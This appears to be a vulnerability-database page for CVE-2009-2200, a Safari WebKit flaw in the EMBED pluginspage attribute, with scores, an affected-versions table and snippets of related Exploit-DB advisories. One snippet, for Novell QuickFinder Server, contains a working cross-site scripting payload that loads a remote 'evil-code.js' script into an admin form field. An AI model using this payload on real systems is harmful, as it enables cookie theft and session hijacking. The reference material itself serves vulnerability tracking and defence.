CVE-2009-2200
published 2009-08-12CVE-2009-2200: WebKit in Apple Safari before 4.0.3 does not properly restrict the URL scheme of the pluginspage attribute of an EMBED element, which allows user-assisted…
PriorityP426high7.1CVSS 2.0
AVNACMAuNCCINAN
EPSS
2.39%
82.2th percentile
WebKit in Apple Safari before 4.0.3 does not properly restrict the URL scheme of the pluginspage attribute of an EMBED element, which allows user-assisted remote attackers to launch arbitrary file: URLs and obtain sensitive information via a crafted HTML document.
Affected
60 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | <= 4.0.2 | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
| apple | safari | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities
exploitdb·2009-10-07·CVSS 4.3
CVE-2009-2684 [MEDIUM] HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities
HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities
---
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-048
http://dsecrg.ru/pages/vul/show.php?id=148
Application: HP LaserJet printer web interface
Vulnerable: HP LaserJet 2200, 4350, 4600, 5500, and many others
Vendor URL: http://www.hp.com/
Bug: Multiple Stored XSS Vulnerabilities
Exploits: YES
Reported: 07.04.2009
Vendor response: 08.04.2009
Date of Public Advisory: 07.10.2009
CVE-number: CVE-2009-2684
CVSS2 score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Author: s.svistunovich, a.polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
Multiple security vulnerabilities have been identified with certain HP LaserJet printers,
HP Color LaserJet printers and HP Digi
Exploit-DB
HP Multiple LaserJet Printer - Cross-Site Scripting
exploitdb·2009-07-04·CVSS 4.3
CVE-2009-2684 [MEDIUM] HP Multiple LaserJet Printer - Cross-Site Scripting
HP Multiple LaserJet Printer - Cross-Site Scripting
---
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-048
http://dsecrg.ru/pages/vul/show.php?id=148
Application: HP LaserJet printer web interface
Vulnerable: HP LaserJet 2200, 4350, 4600, 5500, and many others
Vendor URL: http://www.hp.com/
Bug: Multiple Stored XSS Vulnerabilities
Exploits: YES
Reported: 07.04.2009
Vendor response: 08.04.2009
Date of Public Advisory: 07.10.2009
CVE-number: CVE-2009-2684
CVSS2 score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Author: s.svistunovich, a.polyakov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
Multiple security vulnerabilities have been identified with certain HP LaserJet printers,
HP Color LaserJet printers and HP Digital Senders. The vulnerabil
Exploit-DB
Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2009-02-09
CVE-2009-0611 Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities
Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/33708/info
Novell QuickFinder Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
"add virtual server"
https://server:2200/qfsearch/AdminServlet?&req=displayaddsite
Post:
siteloc=%22%3E%3Cscript%20src=http://www.example2.com/scripts/evil-code.js%3E%3C/script%3E
"Default"
Post:
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&re
http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://support.apple.com/kb/HT3733http://www.securityfocus.com/bid/36024http://www.securitytracker.com/id?1022720http://www.vupen.com/english/advisories/2011/0212http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/43068http://support.apple.com/kb/HT3733http://www.securityfocus.com/bid/36024http://www.securitytracker.com/id?1022720http://www.vupen.com/english/advisories/2011/0212
2009-08-12
Published